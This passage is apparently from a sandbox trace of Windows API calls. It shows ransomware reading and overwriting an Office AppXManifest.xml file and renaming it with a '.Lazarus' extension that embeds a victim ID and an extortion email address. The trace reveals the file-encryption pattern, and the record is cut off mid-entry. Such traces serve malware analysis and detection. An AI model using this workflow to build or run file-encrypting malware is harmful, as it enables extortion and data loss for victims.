MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\aldelo.exe") returned 45 [0098.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\aldelo.exe" (normalized: "c:\\program files\\microsoft office\\aldelo.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.090] GetLastError () returned 0x20 [0098.090] GetLastError () returned 0x20 [0098.090] SetLastError (dwErrCode=0x20) [0098.090] GetLastError () returned 0x20 [0098.090] SetLastError (dwErrCode=0x20) [0098.090] GetLastError () returned 0x20 [0098.090] SetLastError (dwErrCode=0x20) [0098.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0098.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.090] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d6778e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9dfb986, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf9e9425d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x5ab2f7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.xml", cAlternateFileName="APPXMA~1.XML")) returned 1 [0098.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0098.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.091] AreFileApisANSI () returned 1 [0098.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml", lpUsedDefaultChar=0x0) returned 51 [0098.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0098.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0098.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.092] AreFileApisANSI () returned 1 [0098.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46048 [0098.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 51 [0098.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.092] GetFileType (hFile=0x420) returned 0x1 [0098.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0098.092] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.092] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.093] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.093] CloseHandle (hObject=0x420) returned 1 [0098.093] AreFileApisANSI () returned 1 [0098.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46a58 [0098.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 51 [0098.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.093] GetFileType (hFile=0x420) returned 0x1 [0098.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0098.093] CloseHandle (hObject=0x420) returned 1 [0098.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.163] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.164] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.164] AreFileApisANSI () returned 1 [0098.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x463c8 [0098.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x463c8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 51 [0098.165] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d6778e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9dfb986, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf9e9425d, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x5ab2f7)) returned 1 [0098.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0098.165] AreFileApisANSI () returned 1 [0098.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0098.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.165] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.165] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.165] GetLastError () returned 0x0 [0098.165] SetLastError (dwErrCode=0x0) [0098.165] AreFileApisANSI () returned 1 [0098.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46828 [0098.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46828, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 51 [0098.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.166] GetFileType (hFile=0x420) returned 0x1 [0098.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0098.166] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0098.166] ReadFile (in: hFile=0x420, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0098.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0098.186] ReadFile (in: hFile=0x420, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0098.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0098.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0098.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0098.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0098.187] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0098.187] GetLastError () returned 0x0 [0098.188] SetLastError (dwErrCode=0x0) [0098.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0098.188] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0098.188] WriteFile (in: hFile=0x420, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0098.189] WriteFile (in: hFile=0x420, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0098.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0098.189] CloseHandle (hObject=0x420) returned 1 [0098.190] AreFileApisANSI () returned 1 [0098.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x464a8 [0098.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x464a8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 51 [0098.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0098.190] GetFileType (hFile=0x420) returned 0x1 [0098.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0098.191] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0098.191] ReadFile (in: hFile=0x420, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0098.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0098.266] ReadFile (in: hFile=0x420, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0098.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0098.267] GetLastError () returned 0x0 [0098.267] SetLastError (dwErrCode=0x0) [0098.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.268] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0098.268] WriteFile (in: hFile=0x420, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0098.268] WriteFile (in: hFile=0x420, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0098.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0098.269] CloseHandle (hObject=0x420) returned 1 [0098.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0098.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71b68 [0098.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0098.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a9f0 [0098.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0098.269] AreFileApisANSI () returned 1 [0098.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0098.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0098.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 51 [0098.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a9f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0098.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe2) returned 0x4ebc8 [0098.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a9f0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=113 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 113 [0098.269] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\AppXManifest.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0098.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0098.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0098.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0098.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0098.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.271] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83543a09, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x119, 